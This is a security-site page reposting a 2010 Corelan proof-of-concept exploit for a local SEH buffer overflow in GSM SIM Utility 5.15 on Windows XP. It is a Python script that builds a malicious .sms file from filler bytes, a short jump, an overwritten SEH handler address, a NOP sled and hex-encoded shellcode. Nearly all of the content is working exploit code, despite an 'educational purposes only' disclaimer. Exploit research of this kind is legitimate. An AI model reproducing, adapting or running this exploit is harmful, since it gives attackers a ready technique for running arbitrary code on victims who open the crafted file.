首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GSM SIM Utility sms file Local SEH BoF
来源:www.seek-truth.net 作者:chap0 发布时间:2010-06-29  

# Exploit Title : GSM SIM Utility sms file Local SEH BoF
# Date          : June 28, 2010
# Author        : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol
# Version       : 5.15
# OS            : Windows XP SP3
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team * Special Greetz to Lincoln
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code:
import time
 
print   "|------------------------------------------------------------------|"
print     "|                         __               __                      |"
print     "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print     "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print     "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print     "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print     "|                                                                  |"    
print     "|-------------------------------------------------[ EIP Hunters ]--|"
print     "[+] GSM SIM Utility SEH Local Exploit\n"

 

sc =("d9eb9bd97424f431d2b27a31c964"
"8b71308b760c8b761c8b46088b7e"
"208b36384f1875f35901d1ffe160"
"8b6c24248b453c8b54057801ea8b"
"4a188b5a2001ebe337498b348b01"
"ee31ff31c0fcac84c0740ac1cf0d"
"01c7e9f1ffffff3b7c242875de8b"
"5a2401eb668b0c4b8b5a1c01eb8b"
"048b01e88944241c61c3b20829d4"
"89e589c2688e4e0eec52e89cffff"
"ff894504bb7ed8e273871c2452e8"
"8bffffff894508686c6c20ff6833"
"322e646875736572885c240a89e6"
"56ff550489c250bba8a24dbc871c"
"2452e85effffff68703058206820"
"6368616864204279686f69746568"
"4578706c31db885c241289e3686b"
"58202068426c6163687468652068"
"75676820685468726f31c9884c24"
"1189e131d252535152ffd031c050"
"ff5508")

buf= "A" * 1834
buf+= "eb069090"
buf+= "F25E4300"   
buf+= "90" * 20
buf+= sc
 
try:
   crash = open("hacked.sms",'w')
   crash.write(buf)
   crash.close()
   print "[+] Visit www.corelan.be port 8800!\n"
except:
   print "Error occured, look at the code!\n"
time.sleep(2)

print  "[+] Exploit file created!\n"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/ARM - execve("/bin/sh","
·MemDb Multiple Remote Dos
·Netartmedia iBoutique.MALL SQL
·Winamp v5.571 Malicious AVI De
·UFO: Alien Invasion v2.2.1 Rem
·Mozilla Firefox 3.6.6 Denial o
·Free MP3 CD Ripper 1.0 (0day)
·Linux/ARM - setuid(0) & execve
·WarFTPD 1.65 (USER) Remote Buf
·Linux/ARM - setuid(0) & kill(-
·Mozilla Firefox 3.6.4 Denial o
·Polymorphic /bin/sh x86 linux
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved